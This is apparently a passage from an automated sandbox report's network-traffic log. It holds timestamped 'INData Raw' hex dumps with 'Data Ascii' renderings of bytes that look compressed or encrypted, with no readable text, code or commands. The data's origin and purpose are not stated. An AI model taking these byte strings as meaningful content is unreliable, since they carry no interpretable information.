                                                                                                                                                2022-09-29 12:49:26 UTC4671INData Raw: e9 80 41 86 98 f3 d5 a8 2a 6d f3 8b 33 6f 77 11 d1 25 f6 e7 d2 a6 66 af fd 77 f7 d3 d2 34 ff 2f 14 4d af bb 28 a5 94 66 0b 93 f5 4a 32 a7 93 b8 44 ee 2c cf 1c 02 07 4e 53 ca 08 be 8b 8e 30 3c 64 14 4f e6 c4 0e b4 5a fb b3 24 84 1c 8b 8a 45 80 af 89 20 ab c2 c1 ea 11 85 63 36 0b 66 4e 84 87 c6 f5 2f 0a fc 29 b7 bf 8f 03 c8 9c d8 db 53 26 7a f5 22 98 00 50 e6 e0 d5 81 1d d5 2c dd 92 89 fa 7e 9b c0 d6 55 02 0e f6 6a ab 3d ae 3a 2d e1 73 7f c1 04 08 5c e5 26 37 3d 78 82 75 0c 7c 07 eb c9 2e 17 a8 b6 c5 e4 9a c1 a6 17 0d 19 6d 66 e0 49 43 3f df 62 b5 76 76 bb 4a 16 b1 3a ca 39 2b b5 8e e3 11 e3 31 66 80 a9 5a dc ad 9e 3a 6d 33 ca ea fd 3a 17 b8 6f d7 a6 93 99 81 5e 01 31 57 43 fb d2 f5 3a 59 ff a6 fb a8 aa 05 a9 42 a5 0b 5b 42 91 ff 1e 0c 3c e4 e5 fa 05 f6 d4
                                                                                                                                                Data Ascii: A*m3ow%fw4/M(fJ2D,NS0<dOZ$E c6fN/)S&z"P,~Uj=:-s\&7=xu|.mfIC?bvvJ:9+1fZ:m3:o^1WC:YB[B<
                                                                                                                                                2022-09-29 12:49:26 UTC4687INData Raw: 57 a4 e7 b2 88 bf 91 02 29 64 a3 89 0e ef 70 9a 7f a9 53 1b 72 d3 d6 83 1f af fe 27 1c 2e 24 05 e9 8c 0e d5 22 81 fd 45 33 db 02 f2 36 79 d5 63 1f 6a d7 52 34 5f 76 11 16 fa ab 4d 20 3d 6a 94 d2 08 ef a6 c6 1a dd c8 cb 54 bc 38 51 42 30 3a 0d 81 bc 04 87 ee 22 1b 20 a4 fa de 81 a0 b3 77 ce c2 78 0d c6 5e c4 9c 12 de 86 a2 41 22 17 3e 7b 3e b3 2c 3c a1 a8 e0 92 c7 71 df 82 4a 41 2f 86 2b 70 bb 42 4a ea ec 51 b7 db ec f9 17 8d d4 c8 4f 8f 5b 29 db ef f7 a3 19 bd ff a1 f0 04 9f 43 e3 c0 ad e9 9d 63 7e 09 f7 42 11 f6 fb 09 1d 72 37 27 70 49 64 a9 32 db a7 ce 98 d8 78 fd 7d 26 be fd 7b db af bc c1 1e 82 f0 ec f9 9e 3c 74 66 76 2f 9f 08 de 1d 72 97 87 02 f3 53 32 2e 13 ac be 2b 6a b9 61 79 9c 13 17 4f dc 5b ca 89 36 9c 20 11 ab 3b 78 c3 7e 83 f4 17 ff b8 20 8f
                                                                                                                                                Data Ascii: W)dpSr'.$"E36ycjR4_vM =jT8QB0:" wx^A">{>,<qJA/+pBJQO[)Cc~Br7'pId2x}&{<tfv/rS2.+jayO[6 ;x~
                                                                                                                                                2022-09-29 12:49:26 UTC4696INData Raw: 06 c5 64 b0 8f 10 8c 0b 43 fe 8d e2 e3 0a 0a 97 07 0b 73 e8 c9 fe a7 a2 a1 e6 73 6c 53 38 d3 6e 27 8f f5 6d d8 f5 03 79 dd 47 d7 32 12 62 22 87 71 c9 d3 23 30 29 16 e7 8d 40 80 f8 ec d0 ac 00 bc 68 2b d2 f0 ac ea 79 06 c4 3b 7f da 15 52 b6 fe 4b a5 ea c9 59 7b 34 2a c6 28 c6 45 9e bb 55 ce 7d 0d 86 fb b2 2e 20 b6 a8 77 00 c0 67 f1 24 c4 34 41 bf 75 2d fe d0 b4 ef cc 9a 41 52 eb ee 5b 46 e4 7f 31 0c 23 85 7f 2a 48 19 3f a1 63 af c1 76 97 54 df e6 d5 8d 33 4f 43 c6 69 ec 05 22 6d 5e 5d c7 6c db 74 83 7b d1 ef 2f 93 62 d4 9e ab 0d e3 ac ed 84 03 5c 00 de e6 7e 47 38 22 db b9 f4 cd 60 4b fc 17 ae 9b 57 15 bf 49 15 b1 f6 c4 fb 55 b1 f9 42 c4 0d 13 ab aa 43 2a 88 3f 63 d2 fe 17 ee c7 ec 3b b6 c7 32 2b ca 49 45 d6 33 2f b4 38 37 c6 e3 8e 93 c9 94 79 49 23 3b 12
                                                                                                                                                Data Ascii: dCsslS8n'myG2b"q#0)@h+y;RKY{4*(EU}. wg$4Au-AR[F1#*H?cvT3OCi"m^]lt{/b\~G8"`KWIUBC*?c;2+IE3/87yI#;
                                                                                                                                                2022-09-29 12:49:26 UTC4712INData Raw: 65 ce f8 dd 13 1f 8b 89 a1 3b 37 46 9e a4 84 7e fd f4 80 aa b7 f2 67 eb 57 94 1e 02 0c c6 7c 8d 2b 24 7b 35 b2 57 03 d3 ef 9d 49 92 26 d6 7c 3c c1 47 d5 17 2d 68 3a e8 20 3c 1a 29 db eb 92 32 e3 65 69 4b bd c3 d0 2a 27 56 4b 1a ac 3c 53 5c 77 6a 8d f0 26 b1 d2 00 ab ad df 98 58 86 4a 31 d3 c9 b3 43 8e 0c eb 57 f1 9e 5f 2f b0 4c ab fb 64 58 f9 0b bd 17 26 cb e3 a5 1b 07 49 27 98 85 65 48 e7 1e 4e 07 be 08 b6 94 ae 04 78 d0 0d 83 1a bd 67 83 b9 d3 5e f1 f1 4b 75 e2 9f 4a 3d e0 1a 6a 5e b1 e4 32 6b 55 51 35 25 c6 62 97 09 3b ce 5c 48 1a 96 9d a7 a4 a9 ba bf ec 3c 24 49 af 73 05 8d f2 54 8d e1 46 56 02 df 23 f1 47 ee 02 3b 40 72 87 bc b9 c7 29 63 a2 95 ef 1c fd be 62 24 9d 98 9a ae da 08 90 a3 27 55 db c3 42 99 e4 06 ac a8 06 d2 a7 57 79 01 82 ec 96 34 da 4b
                                                                                                                                                Data Ascii: e;7F~gW|+${5WI&|<G-h: <)2eiK*'VK<S\wj&XJ1CW_/LdX&I'eHNxg^KuJ=j^2kUQ5%b;\H<$IsTFV#G;@r)cb$'UBWy4K
                                                                                                                                                2022-09-29 12:49:26 UTC4728INData Raw: b7 54 8f c4 81 53 b7 df fb d2 5c 68 52 6a c8 01 5a 5f b6 ce 8b 91 8c a8 38 22 dc 8a 59 12 a2 7a 64 b3 48 b9 ed 2c 98 51 9a d1 5a 2b 08 ad f5 58 e0 b0 8b b9 dc 84 48 71 77 18 d3 67 6c fb db 58 c6 f1 6c 0f 34 4b 4c d7 16 8d af aa 56 bd e2 ac 91 75 dc f1 48 4a 19 32 f7 4f bf f6 70 94 31 7c a3 27 de a2 cd 97 01 26 20 92 e1 26 38 ba 87 e6 55 94 a9 e5 35 ba 65 ce e9 87 9e 43 72 54 5b db 6d a6 ac 73 d3 d4 14 24 44 65 71 4c 73 3a 21 9b dc 4e a3 a9 20 75 c1 0e 36 be 08 35 6a 41 60 0a 37 06 90 43 7b df 4b 1a 27 d3 51 3a 5a 43 c1 d4 1c 50 21 a1 33 da a1 ac 0b e0 30 e2 1d 67 33 c6 7d 65 ad 09 ba b7 dc d0 85 99 6b 5f f1 62 98 a3 74 83 f4 dc 8b ab 87 99 26 23 39 38 d0 17 37 a0 96 9f 99 5c f1 f3 28 9d cb e0 c4 86 5b 0b 75 0c 4a 0d cf 3d f3 cc 37 e5 97 d6 85 56 11 cb a9
                                                                                                                                                Data Ascii: TS\hRjZ_8"YzdH,QZ+XHqwglXl4KLVuHJ2Op1|'& &8U5eCrT[ms$DeqLs:!N u65jA`7C{K'Q:ZCP!30g3}ek_bt&#987\([uJ=7V
                                                                                                                                                2022-09-29 12:49:26 UTC4744INData Raw: 13 e9 88 d8 4b 7d b1 10 4f ff b5 57 70 e5 c5 11 1e ff 14 27 5b bb a8 46 6e fb 1c d4 e7 ac b0 0c 12 55 48 0c 36 8e a8 5d 7d ab 8d 67 8f a6 db bb 2a ff 10 d3 75 da 35 c1 ed 8d 26 e7 8e 35 62 0d 44 d0 99 28 f6 5b 6e 95 2f 08 63 f1 fb 23 81 d7 27 f0 fb c3 15 59 e1 4e c2 1b 24 50 72 4e 14 09 88 83 51 60 8c 3c 92 2d 16 4f 1f 99 70 db 8c 0e 18 b8 d5 c6 5c 98 82 93 20 58 c8 b0 9d 0a 63 1a b9 d6 69 7e 4d 3a dd 6e f6 4f 07 d1 5c 69 22 b8 66 f5 6d 43 be 12 fc 52 72 b9 cb f6 d1 ac db 98 74 b8 80 04 db 2c 55 40 2e d8 c9 95 24 7b 45 79 fc fa 8a 6b 00 2b ae ca 6e ff ed b2 c1 17 19 5a b1 33 52 5a 1c 90 f6 41 48 b0 9c ca 58 af 15 2a 4d fa 82 a2 d1 e2 21 bd 44 82 31 11 fe 18 ba 87 6c db 57 40 48 08 5c 0f 81 20 78 9e 92 9a 48 0f 73 9a 02 68 00 0e 59 d1 23 be e9 4a e5 55 04
                                                                                                                                                Data Ascii: K}OWp'[FnUH6]}g*u5&5bD([n/c#'YN$PrNQ`<-Op\ Xci~M:nO\i"fmCRrt,U@.${Eyk+nZ3RZAHX*M!D1lW@H\ xHshY#JU
                                                                                                                                                2022-09-29 12:49:27 UTC4760INData Raw: 27 a1 02 a3 4c 45 15 b5 10 f1 be 05 0d df a4 1d 73 6f 1f 26 db a9 d3 9f 80 5b de 2e 27 0c f5 3f 5e 17 ae 26 47 62 f0 7e 1b 22 0f 56 53 09 ca d3 14 e8 39 f5 13 ba 5d b4 52 03 24 01 43 73 f3 06 a3 8e c7 17 fb dd 5e 05 7b 66 67 f2 ee 8e c0 3c 81 41 2a 1c d8 88 4c 4f d5 4f d3 6e 6a f0 3d d6 40 a7 2d ac 7e f5 c8 81 79 62 07 f4 ce df 77 55 16 c1 af 22 fb 00 bc 2c 09 84 31 d2 60 ee 5b ff 5f 42 ad 03 ee 76 1c bd bf f0 b6 01 33 05 1f 40 4e e3 26 a1 b7 2c 13 e4 af ef 6c bb 93 59 b7 b2 5d 51 9a 77 76 93 6c 13 1c fc a8 21 8b 03 d6 c5 d2 e1 f2 7a 20 dc 37 7d c2 a5 1d 14 69 4b e7 1d d1 a3 f4 19 bb 44 7a f2 e5 2a 22 a8 d7 f9 dd 5e 1a a7 5a 73 2f 12 24 2e cf b4 d7 ce c7 29 d4 0c 68 84 c6 9e 93 aa db d9 2b 49 5e af 89 9e 91 95 ec 51 eb f1 5b e2 b7 87 48 96 6a 37 ed 21 7c
                                                                                                                                                Data Ascii: 'LEso&[.'?^&Gb~"VS9]R$Cs^{fg<A*LOOnj=@-~ybwU",1`[_Bv3@N&,lY]Qwvl!z 7}iKDz*"^Zs/$.)h+I^Q[Hj7!|
                                                                                                                                                2022-09-29 12:49:27 UTC4776INData Raw: 24 ee 27 92 7f aa 45 e6 f8 40 61 0c 5a 9b a5 0e ed 24 d4 d3 d2 55 2b b3 aa ae 29 cb 88 a2 4c d0 dc 0b e8 4c 28 a5 36 d0 5e db 20 27 89 8f 58 32 58 7a c7 08 83 ec 2a 42 a9 d3 08 d7 ec d5 e2 ce 76 b2 25 94 2a 19 f0 2d cd 0a 9e b1 8a 22 45 a5 a6 ec a3 80 de d4 eb 90 30 6e ef 11 33 27 a6 6a dd de c1 d8 dd 94 17 6a 91 3f 32 d5 26 9d cc a3 3a f6 02 09 0b 91 1a 6a 60 7d 5e f1 32 12 9a f2 a9 74 d7 9f a5 0d 74 b2 ad b5 ee ae 18 b3 bc 24 bb dc fc 5f 40 f1 4a 02 c2 bb 26 0e 27 77 62 52 4c 3d 36 aa 50 3b 42 db f8 3f 19 bc 63 e1 14 88 d7 6b 0a af 7e b9 bc c7 a4 66 ba e9 66 20 e1 5c bd 9d a7 27 20 97 cf ea 66 dd 4c d9 aa 56 02 65 ff 9d 13 03 d8 5a 39 90 6e 97 6d dd bf 29 60 6b 28 53 5f 55 e5 af 63 1b 3b 7e b3 7b ef 0d 57 b0 d9 65 b7 f5 52 56 e6 8a d1 4b 98 e8 73 21 0f
                                                                                                                                                Data Ascii: $'E@aZ$U+)LL(6^ 'X2Xz*Bv%*-"E0n3'jj?2&:j`}^2tt$_@J&'wbRL=6P;B?ck~ff \' fLVeZ9nm)`k(S_Uc;~{WeRVKs!
                                                                                                                                                2022-09-29 12:49:27 UTC4792INData Raw: 2e 06 fd 55 ed 8d 76 dc 3b 4e b1 ab 58 0e 4c 11 2c 4a e3 a0 a3 aa 3e de a8 fb c9 e1 58 92 5d 2e c9 09 6f 8e ab 7d c1 13 5b 45 58 78 39 fb 1f 05 bf cd 56 b8 9d 59 3e 00 3b 24 d5 38 f5 c5 0f 94 83 98 c4 bd 25 75 8e ef bd 72 e1 85 df 6b e7 3a d1 67 aa 41 2a 57 97 12 e7 2c 8d 28 88 f2 88 f8 c3 1b 31 51 bb c6 86 cc 89 31 2d 5e dd 2e ac 64 ad c9 22 8f e0 4d 2d cf 8c 1a e5 b2 20 56 6f 93 bf 00 82 9d c7 73 50 56 f6 30 25 85 1c fc 28 46 04 2b b1 4d 94 13 f2 4d be 66 3d 20 9f 76 c0 ec aa 66 40 ea 6e 41 b1 f1 e1 da 72 9f df 2b 64 da 2f 61 e0 24 46 0f 35 22 d4 d8 20 86 e6 01 ff 79 0c 7d 00 46 36 b8 e6 ee 0d 93 60 bf e7 9e 9d 02 5a b6 18 6d cf f8 a1 a5 4e 7f 89 bc a6 86 f3 73 b3 24 2c 54 ea 21 7a 67 d1 62 c2 e2 11 59 30 ae 5d b4 d6 e9 c8 6f cf a6 7c 2e 56 b1 8a 7f 06
                                                                                                                                                Data Ascii: .Uv;NXL,J>X].o}[EXx9VY>;$8%urk:gA*W,(1Q1-^.d"M- VosPV0%(F+MMf= vf@nAr+d/a$F5" y}F6`ZmNs$,T!zgbY0]o|.V
                                                                                                                                                2022-09-29 12:49:27 UTC4808INData Raw: a4 0e d7 67 62 72 d5 c9 4e 9a 2f 5f 73 cf 56 ef 03 c5 8e 51 3c 05 34 67 63 b8 26 9e 58 68 16 c4 81 7d e4 31 bd ca 84 64 0f 8a a9 fb 7b 23 c8 cd 7b 6a 71 fe 2a 5d 8d 0d b8 0b 9c 22 ba 56 c9 71 ff c6 75 4b 3d 25 d9 78 a2 b3 0a dd 08 c0 52 52 ca c6 0f 5c 43 96 8f ad 94 b3 65 ed be 5e 34 f5 d3 18 35 37 4c 6c 29 ef 14 cb 94 b4 f9 26 80 f5 0c e8 6f a0 f0 af 17 dd 5d 66 f0 9e 0e c9 7e 97 b9 de 75 14 69 1d b5 ab d4 5c 80 58 e2 0b 95 48 52 04 03 c6 f6 9f b5 3e 54 14 ee a4 25 b2 7f 37 7f 31 3a 08 bd 1d 0b 40 0a 5d 18 ad 95 05 7d 76 eb 2a 80 e9 1a d8 16 2d 17 64 7d ab ed 6e 44 b1 57 cc f0 a7 bc ba e8 6c c4 31 b7 27 14 6e 29 f7 cc eb 6a 00 5e ce 9d af ab be 49 10 52 2f 42 2a f9 b2 36 13 c3 f3 d3 24 5b 08 8d c6 da 14 72 cc ba 58 6a 99 34 0d 33 60 bd 61 d0 04 c9 4b a7
                                                                                                                                                Data Ascii: gbrN/_sVQ<4gc&Xh}1d{#{jq*]"VquK=%xRR\Ce^457Ll)&o]f~ui\XHR>T%71:@]}v*-d}nDWl1'n)j^IR/B*6$[rXj43`aK
                                                                                                                                                2022-09-29 12:49:27 UTC4824INData Raw: a3 ef 05 77 93 eb cb 90 cf b6 e3 8d 0f e5 5d 34 2c b1 5a a1 a7 75 6a 00 71 ef a5 55 7d 00 e1 39 0b 91 70 c6 fc 49 bd 6d d9 4b bc 1c f8 c2 21 5b 4a ec fe e7 7a ee 6f 69 57 0d 26 91 24 f6 49 23 1c fb 9d e4 88 70 1f 7c 06 26 a6 68 66 26 86 9d 40 6c 68 7f 93 18 e5 53 48 f6 b7 51 19 e2 90 9c 41 6e ab 62 ba b0 9b 1a 74 0a aa 73 11 2f 61 cf c8 5f ce cc c0 98 c4 6b 94 68 a5 1b 07 4f f3 f9 8a 3d 48 90 47 7a 64 46 08 71 4a f8 9a e9 3b e6 87 49 cb 1e 5d 5f c4 71 dc 44 1a 35 ed 96 f6 64 42 ba 2f 11 78 f4 46 c4 e7 a4 e8 ea 0c 36 e0 cb 8e 85 cf 77 1f 8a f0 7a fb 20 2d 57 8c c7 40 eb 4e c4 12 6e e5 52 87 fe 54 f1 9f 85 42 55 b5 c7 3d 01 01 cd 45 31 c0 e0 33 b7 e2 99 ac f6 c0 03 76 60 fd 91 7a 23 48 4a 45 ce 84 41 b8 e1 7c 74 92 bd 63 4c 69 d5 9e 7b a5 06 f0 9e 28 22 68
                                                                                                                                                Data Ascii: w]4,ZujqU}9pImK![JzoiW&$I#p|&hf&@lhSHQAnbts/a_khO=HGzdFqJ;I]_qD5dB/xF6wz -W@NnRTBU=E13v`z#HJEA|tcLi{("h
                                                                                                                                                2022-09-29 12:49:27 UTC4840INData Raw: 5e 2d 69 e5 37 a5 55 e1 71 1b 40 5c 95 3f 78 5a 8d c0 b6 05 52 15 2b 92 93 cd bc 24 be d3 a3 8f ad 61 d4 8c 2d f9 76 d2 79 fc 2a c2 b8 be fd 35 36 b8 d3 68 7f 44 04 50 ff 00 22 78 c0 5f 84 1e 44 d5 c3 5d 98 17 63 e9 1e 0b cd a2 d4 20 ce 44 d2 de 5a 85 72 06 a5 fb a7 35 ee ef da da d0 b6 92 e0 55 b0 3f b0 75 92 95 85 76 17 ec 2e b3 7c a2 eb 83 e0 ad 64 ea f7 6b 81 c1 e8 56 47 86 41 a4 67 28 4e 8b 6c f8 38 d0 6c a1 f7 23 27 f1 2f 24 78 6a 48 2c 75 c2 f4 42 b6 74 af b8 e5 95 76 3b 6a 08 5c 6d 66 e9 6f b2 4a a7 bc 67 0d 82 1b 8b 12 47 c8 50 84 ae eb 49 64 0d bb 3c c8 84 06 47 1c b1 eb 30 16 e6 5d d5 92 4a fd b8 47 03 1e 1d 44 70 ba 55 c0 b1 96 44 67 8d c6 13 6e 6b 79 32 de f6 1d 04 0f 7e 6d 8f 20 6d 2c 6b 06 a7 51 70 ac 3c d8 40 03 01 d3 c5 27 d4 b1 17 93 cf
                                                                                                                                                Data Ascii: ^-i7Uq@\?xZR+$a-vy*56hDP"x_D]c DZr5U?uv.|dkVGAg(Nl8l#'/$xjH,uBtv;j\mfoJgGPId<G0]JGDpUDgnky2~m m,kQp<@'
                                                                                                                                                2022-09-29 12:49:27 UTC4856INData Raw: b3 08 4d 03 c3 36 20 61 75 d8 cb 07 6e e9 1f 42 7b dc ec 03 6d ab 83 7d c3 73 fe b9 6b 54 96 18 77 f9 d6 57 60 1f c4 71 7b e2 cc 59 03 8c 24 a8 56 49 28 ed 19 b1 a4 86 1c 30 6a d6 db 6b c2 b6 9a 6c 1a 32 7a ad a3 58 25 8a 2c 73 c4 b4 8c 35 51 31 3e a8 72 4a ea ca 50 12 dd 14 b0 86 77 02 80 a0 dd 95 b9 dc 09 e7 bf f1 d4 b7 f2 50 3b ab c1 73 24 8a 6c e3 f9 e2 ab 88 62 32 40 6c 52 0b 5d 63 d9 92 f2 63 26 46 30 8d e5 83 3b 66 7c 94 25 6c e5 87 7b ab 1e d0 af 0e 4a 5c 22 48 81 a2 a7 53 7e 1e d8 9c ba 10 fe a9 22 e6 5e ad 01 7e b3 f2 a6 93 71 a6 7b 53 62 8a d3 cf 45 d9 db 03 8c 2d 82 8a 6c e3 7f 18 fb f9 4f 76 d0 5f d6 dd 5b 4e 8d 57 10 4b ae 32 e3 e1 8a a4 3c 91 b3 3b e3 fc 57 b4 6f fe 7a 3b 1d c0 e9 43 8b b3 21 ed e2 25 0f 49 da 15 78 94 90 0e 06 50 1b bf 88
                                                                                                                                                Data Ascii: M6 aunB{m}skTwW`q{Y$VI(0jkl2zX%,s5Q1>rJPwP;s$lb2@lR]cc&F0;f|%l{J\"HS~"^~q{SbE-lOv_[NWK2<;Woz;C!%IxP
                                                                                                                                                2022-09-29 12:49:27 UTC4872INData Raw: a4 bf 09 f7 31 a3 d7 ab 6e 7c 8a 3f f0 93 de 2b ff 3f 94 a3 ba da d8 c5 d1 d1 39 82 28 3c cc de 7a 42 98 20 12 76 a7 b9 82 d9 3d cb 2e 94 e5 7f fa 9a 15 7d c4 92 e3 0d 5e 01 d9 98 53 b5 d4 e1 b0 17 16 3a 5a a7 e2 24 a9 26 81 62 78 33 5f bc 3f 40 b3 61 53 07 0d f7 15 1a df 61 46 58 37 93 40 13 87 ce e5 04 a8 67 ca 8d bb 43 a7 a7 0f a4 aa 2d 7d 73 aa c7 31 07 a4 52 96 3a b9 38 b9 d3 1a 8e bb 7c 69 05 f4 ad 13 9f 5c 90 29 fd c5 34 35 05 1a 48 a0 cd a8 d5 bf 60 40 b5 39 e2 60 d1 b4 bd 25 b3 88 56 d3 dc 11 ed e7 6c 2c 0d 6c 94 2c 9c c5 7c da 16 ac 5b 05 36 80 6c 45 de f2 06 78 0c f9 ec 8b 18 5c 5d d2 9c 9f 2c bb 5c ea 15 18 be e0 01 4d 37 2e d4 98 6f 11 23 7d a3 21 4a e6 16 27 f4 ea 4d 1b c3 ad ae 67 0e f7 34 c0 3c a4 ed c7 cb b7 0a b6 e5 9b a6 cc 1e 73 ea 33
                                                                                                                                                Data Ascii: 1n|?+?9(<zB v=.}^S:Z$&bx3_?@aSaFX7@gC-}s1R:8|i\)45H`@9`%Vl,l,|[6lEx\],\M7.o#}!J'Mg4<s3
                                                                                                                                                2022-09-29 12:49:27 UTC4888INData Raw: a1 cd b9 03 41 ad 7f f5 5b 86 0e c8 08 03 df ce 53 a0 f2 ec 9c 24 3d 72 a4 6e 3c df 51 23 4c 19 6d 9d 22 55 e5 b8 c5 a8 5a bc 5b ce b0 41 35 29 5b 8a de 2d 0f 3b f9 81 63 6d 59 39 35 98 ef 3b 25 64 c0 80 d3 6c c2 7f 65 9d fb 64 66 02 b1 d5 13 a6 11 7a 45 56 35 a4 4f 32 4e 58 17 7c 30 35 a7 d9 7c 62 99 61 05 b6 4c e9 b0 99 8f 54 5e 49 c5 32 bb e4 c9 8a f8 3d df eb 0b 9e 17 00 a5 65 b0 db 74 34 2b 49 87 3b 25 4b 76 90 07 2f b6 dd 1d 13 42 a4 2a 39 b6 c4 c2 5e c5 d6 ba ce f6 9c b2 f8 6e 94 bd 08 65 bb 2b 57 c4 25 57 36 37 f9 ce f9 f8 a1 4f 69 90 9d 89 e1 32 b4 29 6b 46 fb 80 1a 4f 73 e9 6e c1 cb 8d c0 a6 5f 6d f4 49 ed 6b 6b d0 a1 0a 4b 4e 8b 70 a7 a6 2c 8c 6e ee 7e 50 a0 fc d9 91 d8 27 13 46 38 a4 e6 94 5d 34 d7 8e cd c8 1d 0e 2c 59 ef 75 1b a4 10 1c d4 31
                                                                                                                                                Data Ascii: A[S$=rn<Q#Lm"UZ[A5)[-;cmY95;%dledfzEV5O2NX|05|baLT^I2=et4+I;%Kv/B*9^ne+W%W67Oi2)kFOsn_mIkkKNp,n~P'F8]4,Yu1
                                                                                                                                                2022-09-29 12:49:27 UTC4904INData Raw: 05 fb 7e dd 35 26 69 2f 58 cb 13 d2 36 7c c2 38 82 50 a5 06 cf 7f 96 69 f7 d9 72 32 1b 16 e8 07 1c c1 07 53 70 18 88 bf c0 44 17 07 91 12 c6 b2 bf 04 89 89 f1 f0 17 bf 3a 10 24 2d 61 32 9e d2 b3 00 46 6f 2f dc 80 df 14 ec ee 9d 3a ec c7 a7 a5 d9 c7 5f c1 1e e0 97 b0 3d 95 32 22 4d 17 38 10 b1 64 49 e7 49 01 9f 15 6f 46 b0 dc 19 e8 7b bd bc a6 b9 eb 80 a8 43 74 62 d5 34 d6 21 7c a4 d9 7a 2e c3 36 0d cd 55 75 cb e5 5e 36 29 00 b6 4f 86 70 d5 53 74 c4 94 a6 4e bb 9e 5e 6e 48 e4 10 d1 84 b8 2b 4c 3f 34 41 9c 7c f6 bd a9 fe a4 36 4d f9 7f 37 88 36 0b 5c 7e 12 f8 27 08 39 19 6d c5 31 96 5c 77 44 f7 6c 11 d4 23 b5 95 24 e4 34 4e 3f 57 7d a9 7c a0 3a 1b 5e dc 55 c7 37 ce 05 10 b5 94 a4 91 17 59 cf b8 23 32 6e 83 d1 d5 44 b2 71 4c 6f e2 0f 42 fc 8d ea 54 02 09 e0
                                                                                                                                                Data Ascii: ~5&i/X6|8Pir2SpD:$-a2Fo/:_=2"M8dIIoF{Ctb4!|z.6Uu^6)OpStN^nH+L?4A|6M76\~'9m1\wDl#$4N?W}|:^U7Y#2nDqLoBT
                                                                                                                                                2022-09-29 12:49:27 UTC4920INData Raw: 7f ec 55 9c 49 c4 03 9c c8 6e 71 67 2f 08 e5 30 40 dc fa 34 ce 24 33 fb 20 79 39 20 dc 6a 3e df 4b 05 cb a9 d5 6f 35 49 81 c9 62 35 0c e0 35 46 24 48 98 79 17 de 33 10 18 de 87 16 98 58 b2 3e 08 d9 06 43 ef 0f 18 bf cb 23 73 89 6f e7 b0 ac b3 b6 a4 1a cf 7e 57 e5 f8 03 f7 fa ec 6b 2d ab bd 21 3a 56 c0 4e 8b 9e 89 fe d5 d4 e8 d8 d6 77 56 05 ff be ed aa 7e e0 93 84 ec 38 1c 55 db d3 f4 76 3e b6 74 2d 11 72 e0 39 59 01 89 22 3c 27 5c c7 81 fd 6e 78 df 31 97 50 b5 cd 2d 53 fc f4 a8 df 99 52 69 16 36 b5 19 f9 a4 2e 1a 19 fa 36 7b fd 3e 1a 27 51 3a d7 e4 25 31 ab b6 51 b6 d2 da 68 df cb 50 3c 8e 18 65 ce c6 13 03 89 f5 3d 8f 02 47 99 4f 34 f1 4e fa 88 9f da 07 b8 c4 55 f6 aa d7 9f 7b 88 f6 60 6e d1 96 43 56 78 2b 60 74 c9 84 b0 b0 52 a6 e1 c8 13 ae df 01 67 22
                                                                                                                                                Data Ascii: UInqg/0@4$3 y9 j>Ko5Ib55F$Hy3X>C#so~Wk-!:VNwV~8Uv>t-r9Y"<'\nx1P-SRi6.6{>'Q:%1QhP<e=GO4NU{`nCVx+`tRg"
                                                                                                                                                2022-09-29 12:49:27 UTC4936INData Raw: 78 5b 6f 2c 43 2a 48 29 d0 22 db 96 48 92 61 86 c6 c0 ec 05 c0 92 86 d0 dd 72 da 5c 7e df 92 02 c6 fc d2 84 07 ed 6e 3d 85 82 05 3e 3d 2e 04 e3 76 f9 dc 18 35 1a b5 5e 54 d4 04 a8 01 1a 70 9e 47 e0 50 2e 46 50 68 0f e0 71 58 8e e1 cd 4c 2c 7b b1 1c 6f 5a ce 4d 7c 64 c3 d8 97 e2 b9 97 99 61 76 9f 5b f9 37 2c 25 66 34 5c d3 70 1a f5 cf 95 28 b0 bb 75 e8 e3 9d a5 18 b1 b2 eb db 18 2c 8d 96 35 bf 2d d8 fe d9 8e 3d 55 78 b5 1c b6 8a 4b 87 05 3b 9b 21 85 6e f0 95 39 77 00 3d 09 35 36 1a 6e b0 d1 da 6e 33 58 ad e1 12 96 e5 97 63 71 d8 71 52 49 16 03 b3 64 dc 52 f6 7a e6 f7 e7 55 74 7f 80 e0 7b e8 5c 8b 29 97 3a e4 91 a7 d5 50 00 b7 d9 af d4 c0 15 9b c1 dc d2 60 28 cd d4 ab c9 16 0f 68 28 25 8c f2 17 fb 82 92 fb 76 88 35 2e a4 91 36 c2 5b ad db 1c 1f 33 fa 3c 1b
                                                                                                                                                Data Ascii: x[o,C*H)"Har\~n=>=.v5^TpGP.FPhqXL,{oZM|dav[7,%f4\p(u,5-=UxK;!n9w=56nn3XcqqRIdRzUt{\):P`(h(%v5.6[3<
                                                                                                                                                2022-09-29 12:49:27 UTC4952INData Raw: 43 b2 9c 7f 98 57 55 1f 2e 76 83 6b 65 bb 8c 8c 7f 59 d6 c5 fe ba 70 3b 14 a9 6c 33 33 30 03 9d f9 d5 97 18 25 1a c3 29 bc cf 27 3d 99 49 97 ab 91 1d 68 66 79 23 a7 84 09 8f a2 b4 2d c7 b6 9a 2f b6 e3 8f 23 09 b8 a5 f3 27 b2 28 fa d3 39 3f 0b 8c 24 3b 7e aa 2d 27 05 c2 31 7b 68 17 2e f5 5a c2 fc d3 b4 c6 ac 52 26 47 f4 f2 23 ba 7a 04 7c c2 65 34 25 7d cb 6b e5 e0 3e cb 80 f2 c0 dc 25 26 da 9e 44 d8 ef a9 1f 10 4b 26 39 b4 f8 d5 55 04 c1 72 d4 08 f9 8b 78 19 bd f9 f9 37 c4 3e de e5 79 98 d2 69 0d 06 b7 15 04 cd 14 d3 d3 90 22 20 e8 9f 3a 78 19 2a f5 02 d0 d0 6b 9a a7 03 3f 4f 69 ac ed 1c e9 a4 93 dc 9a e8 c6 c7 7f 8c 21 79 da 38 d7 41 ea 73 59 af d2 4c 19 7c 2e 28 11 d0 9a e7 52 4d bd 4f 39 00 69 13 a6 5d a6 8b 15 95 04 8c 31 4d 61 95 1e da 4b 6a 29 04 d7
                                                                                                                                                Data Ascii: CWU.vkeYp;l330%)'=Ihfy#-/#'(9?$;~-'1{h.ZR&G#z|e4%}k>%&DK&9Urx7>yi" :x*k?Oi!y8AsYL|.(RMO9i]1MaKj)
